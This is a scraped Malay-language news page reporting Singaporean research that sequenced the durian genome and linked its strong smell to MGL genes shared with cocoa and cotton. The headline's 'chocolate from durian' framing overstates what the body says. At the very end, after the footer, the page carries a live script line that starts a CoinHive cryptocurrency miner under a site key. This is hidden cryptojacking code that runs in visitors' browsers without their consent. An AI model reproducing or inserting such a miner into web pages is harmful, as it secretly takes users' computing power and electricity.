© Copyright 2017, All Rights Reserved
Home / Ekslusif / Ahli sains kaji cara hilangkan bau raja buah hasil coklat daripada durian

Ahli sains kaji cara hilangkan bau raja buah hasil coklat daripada durian


SINGAPURA: Buah durian sering kali dikaitkan dengan baunya yang kuat serta kurang enak.

Aromanya yang begitu menyengat menyebabkan ‘raja buah’ ini dilarang dibawa ke dalam hotel, pesawat dan beberapa lokasi tumpuan lain.

Namun, bagi yang menggemarinya, bau durian bukan masalah besar, malah ia umpama candu yang menggamit penggemar untuk menikmatinya.

Persoalan timbul tentang dari mana asal bau kuat daripada durian.

Itu kajian yang dijalankan pakar sains di Singapura dalam mengenal pasti punca bau pada durian secara saintifik dan pada masa sama memecahkan kod genetik durian.

Menurut Timbalan Pengarah Kajian di Pusat Kanser Kebangsaan Singapura (NCCS), Prof Bin Tean Teh, pasukan penyelidik di situ telah membuat kajian yang julung kali dilakukan dan menemukan 46,000 genetik pada raja buah.

“Malah, kajian juga mendapati asal usul durian adalah daripada pokok koko dan (berkemungkinan) dijadikan coklat,” katanya sepertimana dipetik daripada portal The Straits Times.

Selain itu, Bin berkata para saintis turut menemukan empat genetik serupa iaitu Methionine Gamma Lyases (MGL) pada durian, koko dan kapas.

Katanya, genetik MGL itu dilihat pendorong kepada pengeluaran bau yang kuat dari durian.

“Ini memberi petunjuk pertama kepada kami bahawa MGL benar-benar menghasilkan bau yang sangat kuat,” katanya.

Sementara itu, Bin dipetik Australia Plus sebagai berkata penemuan MGL pada buah durian ini penting bagi perkembangan raja buah itu dalam industri buah-buahan.

Katanya, para penyelidik boleh membuat eksperimen kaedah tertentu untuk mengurangkan genetik MGL sekali gus membuang bau yang kuat pada durian.


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Asal kucing jalanan kini Labun miliki kad matrik dan ikuti kuliah di UIA

SETAHUN lalu, gelagat seekor kucing yang tekun mendengar butir bicara pensyarah dirakam ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();